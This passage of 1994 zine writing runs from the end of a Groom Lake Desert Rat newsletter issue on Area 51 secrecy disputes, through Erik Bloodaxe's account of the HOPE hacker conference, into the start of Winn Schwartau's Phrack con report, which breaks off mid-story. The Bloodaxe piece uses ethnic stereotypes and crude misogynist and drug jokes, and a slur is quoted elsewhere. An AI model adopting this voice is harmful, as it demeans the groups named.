with the project without any encouragement. It is unknown why he 
singled her out for this special honor, but evidently she was 
"chosen." It should be noted, however, that while blessing the 
reporter’s bed, the loony accidentally dropped one of the cymbals. 
We forgot to check with the reporter in the morning to see if that
omen affected the quality of her nighttime experience.


----- SOUND FAMILIAR? -----


From an AP news story printed in the 8/5 Review-Journal...


"PORT-AU-PRINCE, Haiti -- Authorities deported an American TV
crew Thursday, putting the three journalists in an open pickup
truck, parading them through the capital and then dumping them at
the Dominican border....


"Soldiers detained the freelance journalists for PBS’s ’The
MacNeil/Lehrer Newshour’ on Sunday while they were filming at
Port-au-Prince’s airport. Three of their videotapes were
seized....


"The military-backed government has urged journalists not to
report ’alarmist’ news and has attempted to restrict news
coverage....


"’I think it’s deplorable, and it’s obviously an attempt to
embarrass them,’ [U.S.] Embassy spokesman Stanley Schrager told
The Associated Press. ’This treatment was not necessary; neither
was the deportation.... It’s a transparent attempt by this
illegal regime to interfere with the free flow of information.’"


In related news, four of the five video tapes seized on July
19 from KNBC-TV have still not been returned. The tapes were 
taken without a warrant after the crew filmed an interview on 
Freedom Ridge but not the Groom base itself. Activist Glenn 
Campbell, who accompanied the crew, was arrested when he attempted 
to interfere with this seizure. 


----- CAMPBELL ARRAIGNED -----


Activist Glenn Campbell reports that his Aug. 24 arraignment on 
obstruction charges was "amicable." Charges were presented, but 
the District Attorney did not appear. The complete text of the 
charges, stemming from the July 19 KNBC incident, reads as 
follows... 


Case No. P55-94 


IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP 
IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA 


CRIMINAL COMPLAINT 


STATE OF NEVADA, Plaintiff, 
vs. 
GLENN P. CAMPBELL, Defendant. 


STATE OF NEVADA ) ss. 
County of Lincoln  ) 


DOUG LAMOREAUX, being first duly sworn and under penalty of 
perjury, personally appeared before me and complained that on or 
about the 19th of July, 1994, in Lincoln County, State of Nevada, 
the above-named Defendant, GLENN P. CAMPBELL, committed the 
following crime: 


COUNT 1 


OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC 
1.12.010, a MISDEMEANOR, in the following manner: 


The Defendant did, then and there, after due notice, willfully,
hinder, delay or obstruct a public officer in the discharge of his 
officer powers or duties. Specifically, the Defendant did, then 
and there, after due notice, willfully hinder Sergeant Doug 
Lamoreaux in the discharge of his official duties by locking the 
doors of the vehicle which Sergeant Lamoreaux was retrieving 
certain items from and further refused to unlock the doors after 
being requested to do so by Sergeant Lamoreaux. 


All of which is contrary to the form of Statute in such cases made 
and provided and against the peace and dignity of the State of 
Nevada. The complainant, therefore, prays that a Warrant be 
issued for the arrest of the Defendant, if not already arrested, 
so that he may be dealt with according to law. 


[Signed] 

DOUG LAMOREAUX 

Sergeant 

Lincoln County Sheriff’s Department 


SUBSCRIBED and SWORN to before me 
this 24th day of August, 1994 
[Signed] NOLA HOLTON 

NOTARY PUBLIC/JUSTICE OF THE PEACE 


The only surprise in these charges is the line "and further 
refused to unlock the doors after being requested to do so by 
Sergeant Lamoreaux." That is not how Campbell recalls the 
incident. DR#12, published less than 12 hours after the incident, 
reported it as follows... 


"At this point Campbell, who had been standing on the opposite 
side of the vehicle, reached in and pushed down the door locks on 
the side that Lamoreaux was approaching. 


"Lamoreaux said, ’You’re under arrest.’ Campbell was 
immediately handcuffed and placed in Deputy Bryant’s vehicle." 


Campbell claims that Lamoreaux said, "You’re under arrest," 
IMMEDIATELY after he pushed down the door locks, with no request 
being made to unlock them. Campbell says he has two other 
witnesses, the KNBC crew, who can verify his story. In this case, 
where the basic recollection of facts is in conflict, it will be 
interesting to see what the second officer, Deputy Kelly Bryant, 
will say under oath. 


However, the core of Campbell’s defense rests on Constitutional 
issues. He is guilty of obstruction only if the officer was 
indeed engaged in the "lawful" execution of his duties. Lamoreaux
justified his warrantless search by citing, in vague terms, a 
certain Supreme Court ruling, the name of which he could not 
recall at the time. That ruling is apparently in the case "Ross 
vs. U.S." which allows the warrantless seizure of "contraband" 
from a vehicle when there is a danger of flight. It is unclear at 
this point whether the video tapes of a news crew constitute 
contraband in the same manner as a shipment of marijuana or stolen 
merchandise. Complex First Amendment issues may be invoked. The 
case may be further complicated by the repeated offer by the TV
reporter to allow Lamoreaux to view the video tapes himself.


Campbell has requested, and has been granted, a jury trial. 
According to the Justice, this will be the first jury trial held 
in this court since about 1987. Campbell announced his intention 
to represent himself at the trial, with possible legal co-counsel.
A tentative trial date of Oct. 25 has been set, but it is likely 
to be postponed. Campbell indicated that he will waive his right 
to a trial within 60 days to allow more time to conduct legal
research. 


----- LARRY KING NOT CLONED? -----


Our report in DR#13 about the diversion of Larry King’s plane to
Nellis AFB continues to disturb many of our readers. It raises
the specter of secret contacts between King and the military or
even a surreptitious replacement of the talk show host by a look-
alike clone. Now, we wonder if our panic was only a false alarm.
A producer from a Las Vegas TV station tells us: "I checked into
it and think it is legit. According to the FAA, McCarran Airport
was never really closed, but they did have pilots choose not to
land on that Saturday afternoon because of inclement weather.
They also confirm that there is an agreement with Nellis to allow
planes in trouble to land there. I spoke to the control tower at
McCarran. They checked their records, and they indicate that on
that Saturday a nasty thunderstorm was noted by the tower at 1:45-
2:05. In fact, four takeoffs were delayed during that time due to
weather. Planes in the air just flew holding patterns until the
weather cleared."


Presumably, King’s plane didn’t have enough fuel to maintain the 
holding pattern. Thunderstorms can be very localized, and perhaps 
Nellis was clear. A producer at Larry King Live says that, in her 
opinion, he is definitely the same Larry King. She says he got 
the military escort because he was late for a speaking engagement 
and made his wants known on the plane. 


So what can we say? Obviously, the FAA, the TV station and the 
King producer ARE PARTIES TO THE CONSPIRACY. This story is deeper 
than it seems, and the Rat will pursue the investigation for as 
long as it takes. THE TRUTH IS OUT THERE. 


----- MYSTERIOUS SIGN DISAPPEARANCE -----


The big "No Photography" signs on the Groom Lake Road have 
disappeared. For over a year, they were installed on public land 
about two miles from the military border, but sometime in the 
first week of August they were cleanly removed, posts and all, 
apparently by the Air Force. (A civilian thief--like SDM, who has 
a number of these signs in his possession--would have simply 
unscrewed the signs, not uprooted the heavy posts and carefully 
filled up the holes.) The two signs on either side of the road 
were each about 3 feet by 4 feet and bore the following text: 


WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.
IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE,
DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR
FLYING OVER THIS INSTALLATION. IT IS UNLAWFUL TO REPRODUCE,
PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH,
PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR
EQUIPMENT AT OR FLYING OVER THIS INSTALLATION. VIOLATION OF
EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR
IMPRISONMENT FOR UP TO ONE YEAR. 18 U.S. CODE SEC. 795/797 AND
EXECUTIVE ORDER 10104. FOR INFORMATION CONTACT:

USAF/DOE LIAISON OFFICE
PO BOX 98518
LAS VEGAS, NV 89193-8518


The signs first appeared in May 1993 shortly after WFAA-TV from 
Dallas took video of the base from White Sides. (When challenged 
by the Sheriff, they admitted photographing the base but managed 
to retain their tape.) The signs were removed in Aug. 1994 
shortly after KNBC-TV from Los Angeles lost their video tape after 
NOT photographing the base. It is unclear why the AF removed the
signs. Perhaps they have become a little smarter and are adopting
a "don’t ask, don’t tell" policy toward photography (but we
wouldn’t want to be the ones to test that theory). The signs 
themselves had become a tourist attraction, and no visitor could 
resist having their picture taken beside them. 


At the same time the "No Photography" signs vanished, the 
misplaced "Restricted Area" sign also went away. This is the 
crossed out sign seen in the NYT article, where the "stupid 
faggot" comment had later been written and then erased (DR#12,13). 
God, we’ll miss that sign! It was as illegal as hell--being on
public land--but an old friend to us nonetheless. 


At least now we can assure the public: If you see a Restricted 
Area sign, it’s real and they mean it. 


----- INTEL BITTIES -----


ENCOUNTERS TRANSCRIPT. Complete, unedited transcripts (not just 
the sound bites) of the interviews in the 7/22 Encounters show 
(DR#10) are available to Compuserve users. Type GO ENCOUNTERS, 
and look under "Browse Libraries" and "Interview Transcripts." 
Interviews include Rep. James Bilbray (file FREED2.105), Agent X 
(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105). This 
is a transcript for video editing, so every "Um" and "Ah" is
recorded.


NEW GUARD FACILITY. We send our congrats to the Dudes on their 
newly constructed prefab building next to the guard house on Groom 
Lake Road (about a half mile inside the border). Apparently, they 
are expecting more business along this part of the border and need 
a new substation. Interested taxpayers can view the new building 
from the first hill on the hiking trail to F.R. ("Hawkeye Hill"), 
a location that will continue to be public even if F.R. is taken. 


UPCOMING TV SEGMENTS. UNSOLVED MYSTERIES will broadcast a show on
UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm. The
broadcast will include a new interview with Bob Lazar. THE
CRUSADERS will broadcast a segment on UFOs, including a visit to
F.R., on Sept. 10 or 11 (date and time vary by city). Air date
for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been
confirmed, but it could be the week of Sept. 12.


===== SUBSCRIPTION AND COPYRIGHT INFO ===== 
(c) Glenn Campbell, 1994. (psychospy@aol.com) 


This newsletter is copyrighted and may not be reproduced without 
permission. PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING: For 
one year following the date of publication, you may photocopy this 
text or send or post this document electronically to anyone who 
you think might be interested, provided you do it without charge. 
You may only copy or send this document in unaltered form and in 
its entirety, not as partial excerpts (except brief quotes for 
review purposes). After one year, no further reproduction of this 
document is allowed without permission. 


Email subscriptions to this newsletter are available free of 
charge. To subscribe (or unsubscribe), send a message to 
psychospy@aol.com. Subscriptions are also available by regular 
mail for $15 per 10 issues, postpaid to anywhere in the world. 


A catalog that includes the "Area 51 Viewer’s Guide", the Groom 
Lake patch and hat and many related publications is available upon 
request by email or regular mail.


Back issues are available on various bulletin boards and by
internet FTP to ftp.shell.portal.com, directory
/pub/trader/secrecy/psychospy. Also available by WWW to
http://alfredl.u.washington.edu:8080/~roland/rat/desert_rat_index.html


Current circulation: 1440 copies sent directly to subscribers
(plus an unknown number of postings and redistributions).


The mail address for Psychospy, Glenn Campbell, Secrecy Oversight
Council, Area 51 Research Center, Groom Lake Desert Rat and
countless other ephemeral entities is:

HCR Box 38
Rachel, NV 89001 USA


HOPE
by
Erik Bloodaxe


I was a little apprehensive about going to HOPE. I’d been warned for months 
that "If you go to HOPE, you are going home in a body bag," and "I am
going to kick your fucking ass at hope," and "If you go, you’re gonna get
shot." 


Needless to say I found this a bit unnerving. As big an ego as I may have, 
it still does not repel hot lead projectiles. Add this to the fact that my 
best friend of 10 years was murdered by some random idiot with a pistol in 
fucking pissant, Bible-thumping Waco, TX a few months back. Waco. And the 
shooter wasn’t even a Davidian, just a drugged-out 16 year-old. If the 
kids pack heat in Waco, I know they must come standard issue in New York. 


But, hell, I haven’t missed a con in ages. Could I actually miss
a SummerCon? Especially the SummerCon commemorating the 10th 
anniversary of 2600 Magazine? Could I? 


Like an idiot, I make my reservations. Ice-9, who was stuck with a 
leftover ticket on United, traded it in and we were both off to New York. 


We arrived late Friday night. So there we were: The Big Apple, Metropolis,
The City that Never Sleeps. Unfortunately, it never showers or changes
its clothes either. Why anyone in their right mind would want to come
to New York City boggles the mind. It sucks. I mean, I’ve been damn
near everywhere in the United States, I’ve been to major cities in Mexico,
Canada and Europe, and New York is by far and away the worst fucking
shithole I’ve seen yet. I don’t know for certain, but Port au Prince
probably has more redeeming qualities.


I figured out within a few minutes why New Yorkers are such assholes too. 
First, no one seems to be from New York exactly, merely transplants from 
somewhere else. So what has happened is that they bought into New York’s 
superb public relations campaign and sold off all their belongings to get 
their ticket to America and the land of opportunities. So, they find 
themselves in NYC with about half a billion other broke, disillusioned 
immigrants wading in their own filth, growing very pissed off at being sold 
such a bill of goods. 


It would piss me off too. And I’m sure our cab driver that night missed his 
family’s ancestral thatched hut back in good old Bangladesh. But luckily for 
him crack provides a good short-term solution. Not to mention excellent 
motor skills. 

Twenty-five near misses, and a lengthy carhorn symphony later, we managed to 
arrive at the Hotel Pennsylvania intact. The hotel, heralded in legend and 
lore had seen better decades. About the only thing it had going for it was 
one of the oldest phone numbers in the city. PEnnsylvania 6-5000. 
(Ta-da-dum-dum) I think if Glenn Miller were alive today, his band members
would kick his ass if he told them they had to sleep there. 


For a hundred dollars a night, Ice-9 and I were treated to two less than 
jail-house sized beds, a tv that almost worked, and a hardwired telephone 
(ie: no modular jacks in sight.) In addition, the entire room was stained 
from floor to ceiling, and most of the wall paper by the window had peeled 
halfway down. The window itself opened to a miraculous view of the trash 
12 floors down. We debated on throwing every single object in the room
out the window for a little excitement, but decided it might injure some of
the homeless below.


Anxious to get the hell out of our little cell (well, the prisons I’ve had
the misfortune to sleep in were in better repair) Ice-9 and I took off to
the top floor and the HOPE conference area.


I don’t know why Emmanuel decided to call this conference "Hackers On Planet
Earth." This conference had more right to the title "Hacking at the End
of the Universe." Perhaps even "Hacking in the Cesspool of the Earth."
HEU was in the middle of nowhere, but it was pretty and happy. It should have
been called HOPE.


In fact, as the days went on, I noticed a number of similarities between
HOPE and HEU:


1. Both heavily orchestrated by 2600 and Hack-Tic
2. Both had in-house networks
3. Both had token "fed" speakers
4. Both had seminars on boxing, pagers, social engineering, history,
   UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
5. Both drew extensive press attendees
6. Both charged more than any other conferences. (HOPE 25, HEU 50)
7. Both had over a thousand attendees
8. Both used computer equipment to make photo badges
9. Both tried far too hard to be technical
10. New York used to be New Amsterdam


But I digress...


Anyway, the network room was beginning to shape up quite nicely. Young
hacklets were already clicking away at their keyboards, oblivious to
anything else save their screens. Why anyone would travel all the way to
New York to sit in front of a screen and type all by their lonesome
left me stymied. Isn’t that what we all do back at home?


The first people we ran into were Winn Schwartau and Bootleg. I could
be wrong, but I think a large factor in Winn’s showing up at HOPE was
to watch me get shot and write about it. He told me his article would
be titled, "Cyber-Christ gets nailed to the Cross." Bootleg, however, was
here to raise a little hell. And goddamnit, so were we!


Hacker conferences have always been an excuse for people who only knew
each other over the phone and over the networks to actually meet face to
face and hang out. Anyone who tells you "Conferences today suck, there isn’t
enough technical inpho," is a clueless fuck. You do not go to a conference
expecting to learn anything. If you don’t already know, chances are pretty
damn good that the people who do won’t tell you. You learn by doing, not by
sitting in an audience at some hacker con. Get a beer, make some new friends,
and THEN maybe you might pick up something in casual conversation, but at
least you will have a good time getting sloshed with new people who share
common interests. The only people who will learn something from
hacker conferences are journalists who will then go on to write even
more scathing sensationalist pieces about how hackers will destroy
your credit and eavesdrop on your phone. Is that what we really
want?


Me, Ice-9, Bootleg, Bootleg’s friend from Oregon, and Thomas Icom took off
to drink and see what debauchery lay waiting for us in Times Square.
(Yes, it was a very, very, very mismatched looking group.) Icom, armed
with ever-present handheld scanner, kept a continual broadcast of NYPD’s
latest exploits.


We ended up hanging out on the fringes of Times Square at some sidewalk
deli bullshitting about anything and everything. A recurring topic throughout
the whole weekend was EMP and HERF weaponry. I don’t particularly know
if anyone in the underground would be more excited by setting off one of these
devices, or merely being able to brag to everyone that they were in possession
of one.


We sat talking about the ramifications of setting off some such device on
the roof of the building we were sitting in front of. The thought of
all the neon and electronics surrounding us simultaneously ceasing to
function and imploding at the logic gate level provided for at least an 
hour of hacker masturbation material. Bootleg reminisced about trying to 
track down decommissioned military radar equipment back in the early 80’s 
for just such a project. "I’m surprised it’s taken this long for the 
underground to get up on this stuff," he said. 


As we headed back to the hotel, we passed by the coolest vehicle ever
seen by hacker eyes. The 2600 van was an exact replica of a NYNEX
van, with the subtle addition of the magazine’s moniker instead of
NYNEX, and a ball-capped hack-type tapping away on a notebook computer, 
plugged into the bell logo. It was truly a sight to behold. I began 
to drool. All Phrack has is a beat up, red Toyota Corolla. 


Up in the network room those that were not deeply engrossed in hacking 
the hope.net linux box were either already plowed (Hi Torquie!) or about
to be. 


It was late, so we decided to crash. 


Ice-9 and I managed to wake up at a reasonable hour, and took off to 
see the city. I had seen an electronics store the night before, and 
had been looking for a PAL-NTSC-SECAM VCR for ages. I found it. 

New York’s only saving grace (well, except the huge amount of 
businesses there all screaming for security work) was cheap consumer 
electronics. For 380 bucks I got a VCR that not only converted on the
fly between any tape format, but also had a digital freeze frame
for those elusive screen captures. I was stoked.


After some food, we headed back up to the conference. The buzz was
someone had several hundred cell phones confiscated by Cellular One
reps after he off-handedly remarked that he would clone them
to a potential buyer. I then ran into two of my friends from WAY back
in the early 80’s: Tuc and Agrajag. Ag is an amazing guy. Not only
was he fantastic way back then, he went on to write UNIX for Commodore,
pull stints at places like USL, and is now working with speech
recognition and wireless networking. Yet another fine example of
those ne’er-do-well Legion of Doom guys the government always
frowned upon. Right.


Later that afternoon, as I’m talking to someone in the network room, I feel
someone bump into me. "Oh, sorry," says the person, and I go on with my
conversation. A few seconds later, it happens again. Same guy, same
"Oh, sorry." When it happens a third time I shove the guy back, and
say, "Man, what the hell is your problem." Mistake. I look up straight
into the eyes of a guy about 7 feet tall and 2 feet wide. Well, I’m
exaggerating but it sure seemed that way at the time. All of a sudden
I am an extra in the Puerto Rican version of "Of Mice and Men."
"De Ratones Y Hombres"


The first guy was about 5 feet tall, and scurried around within an arm’s
reach of the big guy. Immediately I realize that if I do ANYTHING, this 
big dude is more than ready to fuck me up, so the little guy must be a 
diversion. The big guy grunts and begins to maneuver around me. 

The little guy then takes his cue and begins pushing me, all the while 
asking "What’s your name? What’s your handle?" I keep backing up keeping 
an eye on the big guy, who is staring daggers at me. Well, at least with 
his one good eye. His lazy eye, stared daggers at the wall, the carpet, 
and a few other places. 


Meanwhile, this little event has gathered the interest of many in the con. 
People began to gather around to see Erik Bloodaxe finally get beat down. 
Unfortunately for the would-be spectators, several others tried to intervene. 
Tuc and a few of the other larger attendees went up to the big guy and 
attempted to hold him back. This only succeeded in him letting out a 
roar-like sound as he shrugged them off and continued coming towards me.


Finally, I say to the little guy, who has been engaging me in what was
basically the equivalent of the mosh pit at a Barry Manilow concert,
(One fucked up guy running into people who don’t want to play his game)
"I’m Chris Goggans, who the hell are you?" To which he yells, "I’M JULIO!"


Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was 
raided by the FBI and Secret Service some years back. While all
his MOD brethren served jail time, Julio worked out a deal with the
prosecutors in which he sold out his friends by agreeing to provide 
state’s evidence against them should the cases go to court. 


And I’m the bad guy? 


Fuck, all I ever did was try to keep my business running free of 
interruptions from disgruntled, jealous teenagers. I never turned state’s 
evidence against my best friends to save my own ass. What am I, Agent Steal? 


At this point everyone rushed in-between us and whisked Julio and his
lazy-eyed, neanderthal boyfriend out the door. (Notice, I can call him
all kinds of names now, because I’m back home in Austin, several thousand 
miles away.) I still have no idea who the big guy was. 


From now on, those of you who sincerely want to kick my ass, have the 
nerve to do it by yourself. I mean, I only went as far up as green in 
Tae Kwan Do, but that was far enough to learn the sacred truth, "Never 
take on more than ONE person or you will get the shit kicked out of you." 
Leave your boyfriends at home and be a man. If I have the balls to
go thousands of miles away from home and enter the DMZ expecting to get
shot, then you should have the balls enough to do something on your own. 
And remember: take the first swing. 


Shortly after "the incident" as it came to be called, by everyone who 
approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele 
took off to find food. Steele decided we needed female accompaniment,
so he invited a reporter from Details. She brought along her camera crew,
who had been taking so many pictures around the con, one would think
they owned Polaroid stock.


Robert Steele is an interesting character. After a 20 year CIA tour he went 
on to found Open Source Solutions, a beltway operation that uses public 
sources of information to build intelligence dossiers. He described 
himself as "a short, fat, balding old-guy." This is like Rush Limbaugh 
calling himself "a harmless, loveable little fuzzball." Their self-image
is a bit removed from reality. Steele carries himself with the air of
a spy. It’s kind of hard to explain, but it would be easy to see Steele
excusing himself from dinner, killing three guys in the alley, and coming
back for a piece of apple pie without an accelerated heartbeat or breaking
a sweat.


On top of being so immersed in the spy game, and having been in charge of 
the design and implementation of the CIA’s data center, Steele takes the
severely radical viewpoint that hackers are America’s most valuable 
resource, and should be put to productive use rather than jailed. This 
man needs to come to more cons. 


Dinner was odd to say the least. The media people sat together, somewhat 
removed from us. They said approximately 5 words to us the whole time, 
possibly feeling somewhat bored by our drunken computer revelry. 

The reporter seemed visibly disturbed by all of us, and the guys
looked like they would be more comfortable sitting in a coffee shop
listening to Tom Waits while having a hearty debate over "Freud vs. Jung."


Our discussions got louder and louder as the scotch flowed, and
by the end of the evening most of the restaurant had heard such topics
as "The CIA does most of its recruitment in the Mormon church," and
"licking the floor at a Times Square peep show." By the time the check
came the Details people were more than happy to pay more than their share
of the bill to get the hell out of Dodge. A word of advice: always
get separate checks when dining out with any of us.


Back in the hood, everyone was milling about waiting for the
History of 2600 panel to begin. There was some kind of problem with
one of the displays, so people were beginning to grow restless. Right
about then one of the best looking girls at the con wandered by. Taking
a guess, I asked her, "Are you Morgen?" She was. It’s almost unbelievable
that someone who would waste time hanging out on IRC and who can actually
interview for highly technical jobs could look like this.


Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to 
get drunk, all of them rather disgusted by the regular con attendees. 
They invited me, so I tracked down Ice-9, who by that time was so ready 
for a pint of Guinness you could almost see the Harp Logo showing up
on his skin like drunken stigmata.


We ended up across the street at a little pub called the Blarney Rock. 
Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots 
went down like Mexican whores. Everyone was in agreement that this
was the best time any of us had experienced at HOPE. In between everyone
drinking, and leering at Morgen, we actually talked about hacking stuff too.
Gee, and we weren’t even on a panel!


As the night progressed, almost everyone from the con ended up at the Blarney
Rock. The con took the place over. The Blarney Rock probably made
more money that night than they had any night in recent history.
Everyone actually mingled, talked, planned and plotted. Plans were thrown
around for the next PumpCon (Boston?), everyone talked about "the time
they were busted the first time," Steele showed up wearing a Chinese
Communist Cap, Fusion cursed at passers by in Korean and almost started
an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend’s
Fallon-esque ability (much to the shock and envy of everyone listening),
Count0 told his decapitated dog story, and there was much rejoicing. (YAY!)


As the night went on, Ice-9 and I decided now was the time to actually 
check out the seedy underbelly of Times Square. At 1:00 in the evening. 
Alone. Drunk. Wide-eyed out-of-towners staggering up side streets in
one of New York City’s sleaziest areas. 


Within a few minutes of hitting 42nd and 7th, we were approached by a 
street hustler. "Yo, what you need? Crack? Smoke? H? You like young 
girls? What you need, mah man?" Ice-9, in his drunken glory, "Yo man, 
you don’t know who the fuck you’re dealing with! I’m the biggest fucking 
felon in the whole goddamn world. You don’t have shit that I couldn’t 
get, and probably don’t already have." The hustler took a double-take 
and said, "Yo, I likes your style." Ice replied, "You damn Skippy!" 


Shortly thereafter, another hustler showed up. "Yo man, you want crack? 
I got the rock right here." Ice looked at him and said, "Man, if I smoke 
any more crack tonight, I’m going to fucking explode." The dealer went 
away fast. 


Times Square isn’t quite as sleazy as it’s made out to be actually.
I’ve been in worse. It does, however, have the most extensive and
cheapest collection of European smut this side of Copenhagen. In fact,
the same movies from Holland would have cost 40 American dollars more in
Holland than they did in New York. Beyond that, Times Square had little
to offer anyone. That is, unless you wanted to spend a buck in a
really sleazy peep show to grope some crack whore. I think not.


Somehow, we made it back to the Blarney Rock alive, only to find that they 
had kicked everyone out. We headed back to our cell and passed out. 


The next morning, I came to early and wandered around the hotel. The second
floor had caught on fire recently, and one wing was completely
barbecued. All the gutted rooms were unlocked and the phones worked.
God only knows why people weren’t using these rooms as squatter’s pads,
considering how broke most hackers are.




The main ballroom in the hotel was very cool. It was easy to see how
at one point in time the Pennsylvania was quite a sight to behold.
I suppose it was much like New York itself in that respect: Once
a marvel of the modern world, now a festering sore crying out for
a good cleaning and some antibiotic.


We left New York at noon that day, and did not even get the chance to 
see the numerous panels scheduled for that day. With my complete absence 
from any panel it’s doubtful I would have made it anyway. 


So, did I like HOPE? Yes. I like cons for what they should be:
a chance to hang out in person with your idiot online friends. Hackers
are an odd bunch. We are all basically a bunch of self-involved,
egomaniacal, borderline-criminal attention-seekers. Rarely, if ever,
can we expect to meet anyone stupid enough to share our interests.
Normal citizens, with whom most of us share absolutely no common frame
of reference, look at us as if we were Martians. Even those
computer-literate folk who talk geekspeak and understand most of
what we are saying are left in the dark when we begin babbling
about breaking into anything.


Collectively, we are all fools, and without the opportunities of
any social interaction with our peers, we will all fall prey to fear,
uncertainty and doubt regarding each other. We had the social aspect 
many years ago in the early 80’s with the proliferation of BBSes and 
teleconferences. Now, much of that interaction is lost. Compared to 
our subculture’s "Golden Age," the teleconferences and BBSes that exist 
today are a pale reflection of the ones of yesterday. All we have is 
the inane banter provided by IRC and the occasional con. 


Our only hope is each other. 


See you all at Summercon 1995 - Atlanta, Georgia.


==Phrack Magazine==


Volume Five, Issue Forty-Six, File 23 of 28


Cyber Christ Bites The Big Apple
HOPE - Hackers On Planet Earth,
New York City - August 13-14, 1994
(C) 1994 Winn Schwartau
by Winn Schwartau


(This is Part II of the ongoing Cyber Christ series. Part I,
"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24,
1994 is available all over the ’Net.)


Las Vegas is a miserable place, and with a nasty cold no less; it 
took me three weeks of inhaling salt water and sand at the beach 
to finally dry up the post nasal drip after my jaunt to DefCon 
II. My ears returned to normal so that I no longer had to answer 
every question with an old Jewish man’s "Eh?" while fondling my 
lobes for better reception. 


New York had to be better. 


Emmanuel Goldstein - aka Eric Corley - or is it the other way
around? is the host of HOPE, Hackers on Planet Earth, a celebration
of his successfully publishing 2600 - The Hackers Quarterly
for ten years without getting jailed, shot or worse. For as
Congressman Ed Markey said to Eric/Emmanuel in a Congressional
hearing last year, and I paraphrase, 2600 is no more than a
handbook for hacking (comparable obviously to a terrorist handbook
for blowing up the World Trade Center) for which Eric/Emmanuel
should be properly vilified, countenanced and then drawn and
quartered on Letterman’s Stupid Pet Tricks.


Ed and Eric/Emmanuel obviously have little room for negotiation 
and I frankly enjoyed watching their Congressional movie where 
communication was at a virtual standstill: and neither side 
understood the viewpoints or positions of the other. 


But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York, 
and HOPE will take place in the Hotel Filthadelphia, straight 
across the street from Pennsylvania Station in beautiful downtown 
fast-food-before-they-mug-you 34th street, right around the 
corner from clean-the-streets-its-Thanksgiving Herald Square. 
Geography notwithstanding, HOPE promised to be a more iconoclastic
gathering than that of DefCon II.


First off, to set the record straight, I am a New Yorker. No 
matter that I escaped in 1981 for the sunny beaches of California 
for 7 years, and then moved to the Great State of the Legally 
Stupid for four more (Tennessee); no matter that I now live on 
the Gulf Coast of Florida where the water temperature never dips 
below a chilly 98 degrees; I am and always will be a New Yorker. 


It took me the better part of a decade of living away from New 
York to come to that undeniable and inescapable conclusion: Once 
a New Yorker, always a New Yorker. Not that that makes my wife 
any the happier. 


"You are so rude. You love to argue. Confrontation is your 
middle name." Yeah, so what’s your point? 


You see, for a true New Yorker these aren’t insults to be
re-regurgitated at the mental moron who attempts to combat us in a
battle of wits yet enters the ring unarmed; these are mere truisms
as seen by someone who views the world in black and white,


Case in point.


I used to commute into Manhattan from the Westchester County
suburb of Ossining where I lived 47 feet from the walls of Sing
Sing prison (no shit!). Overlooking the wide expanse of the
Hudson River from my aerie several hundred feet above, the only
disquieting aspect of that location were the enormously deafening
thunderclaps which resounded a hundred and one times between the
cliffs on either side of the river. Then there was the occasional
escapee-alarm from the prison.


So, it was my daily New York regimen to take the 8:15 into the 
city. If the train’s on time I’ll get to work by nine.


Grand Central Station - the grand old landmark thankfully saved 
by the late Jackie O. - is the nexus for a few hundred million 
commuters who congregate in New York Shitty for no other reason
than to collect a paycheck to afford blood pressure medicine.


You have to understand that New York is different. Imagine, 
picture in your mind: nothing is so endearing as to watch thousands
of briefcase carrying suits scrambling like ants in a Gary
Larson cartoon for the nearest taxi, all the while greeting their 
neighbors with the prototypical New York G’day! 


With both fists high in the air, middle fingers locked into erect 
prominence, a cacophonous chorus of "Good Fucking Morning" 
brightens the day of a true New Yorker. His bloodshot eyes 
instantly clear, the blood pressure sinks by 50% and already the 
first conflict of the day has been waged and won. 


Welcome to the Big Apple, and remember never, ever, to say, "Have
a Nice Day." Oh, no. Never. 


So HOPE was bound to be radically different from Vegas’s DefCon 
II, if only for the setting. But, I expected hard core. The 
European contingent will be there, as will Israel and South 
America and even the Far East. All told, I am told, 1000 or more 
are expected. And again, as at DefCon II, I am to speak, but 
Eric/Emmanuel never told me about what, when, or any of the other 
niceties that go along with this thing we call a schedule. 


* * * * *


God, I hate rushing. 


Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their 
hands" three hour trip to New York is not for the faint of heart. 
My rented Hyundai four cylinder limousine wound up like a sewing 
machine to 9,600 RPM and hydroplaned the bone dry route 66 into 
the pot holed, traffic hell of Friday afternoon Washington, DC. 
Twelve minutes to spare. 


I made the 23 mile trip in something less than three minutes and
bounded into the Budget rental return, decelerated to impulse 
power and let my brick and lead filled suitcase drop to the 
pavement with a dent and a thud. "Send me the bill," I hollered 
at the attendant. Never mind that Budget doesn’t offer express 
service like real car rental companies. "Just send me the bill!" 
and I was off. 


Eight minutes to spare. Schlepp, schlepp. Heavy, heavy.


Holy shit! Look at the line for tickets and I had reservations.


"Is this the line for the four o’clock to New York?" Pant,
breathless.

"Yeah." She never looked up. 


"Will they hold the train?" 


"No." A resoundingly rude no at that. Panic gene takes over. 


"What about the self-ticketing computer?" I said pointing at the 
self ticketing computer. 


"Do you have a reservation?" 
"Yup." Maybe there is a God. 
"Won’t help you." 

"What?" 

Nothing. 


"What do you mean won’t help?" 


"Computer’s broken." Criminy! I have 4 minutes and here’s this 
over-paid over-attituded Amtrak employee who thinks she’s the 
echo of Whoopi Goldberg. "The line’s over there." 


Have you ever begged? I mean really begged? Well I have. 


